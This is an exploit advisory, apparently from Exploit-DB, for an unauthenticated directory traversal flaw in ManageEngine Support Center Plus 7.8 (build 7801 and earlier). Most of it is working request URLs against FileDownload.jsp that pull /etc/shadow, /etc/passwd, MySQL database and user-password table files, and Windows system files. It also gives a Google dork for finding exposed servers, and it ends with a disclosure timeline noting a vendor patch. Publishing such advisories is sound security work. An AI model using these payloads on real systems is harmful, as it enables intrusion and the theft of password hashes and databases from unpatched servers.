ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal

EDB-ID:

17442


Author:

xistence

Type:

webapps


Platform:

JSP

Date:

2011-06-23


Advisory:
ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability

Author:
Robert 'xistence' van Hamburg - xistence<AT>0x90.nl

Software link:
http://www.manageengine.com/products/support-center/download.html

Tested on:
Linux & Windows

Category:
Directory Traversal

Severity:
High

Google Dork: intitle:ManageEngine SupportCenter Plus

Description:

It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.

Requests Linux:

Grab the /etc/passwd & /etc/shadow:

http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false

In a default situation the databasename is "supportcenter" and so it's easy to retrieve the database files like this:

http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fibdata1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile0&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile0&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile1&delete=false

http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaapassword.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaapassword.frm&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaauser.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaauser.frm&delete=false


Requests Windows:

Hosts file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=hosts&module=Request&ID=1&path=..\..\..\..\..\..\Windows\system32\drivers\etc\hosts&delete=false

Explorer.exe:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=explorer.exe&module=Request&ID=1&path=..\..\..\..\..\..\Windows\explorer.exe&delete=false

MySQL database ibdata1 file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..\..\mysql\data\ibdata1&delete=false


Disclosure:
- May 30 2011, vulnerability found
- May 30 2011, contacted vendor (ManageEngine) about security issues
- Jun 1 2011, vulnerability fixed by vendor (ManageEngine) and released as patch 7803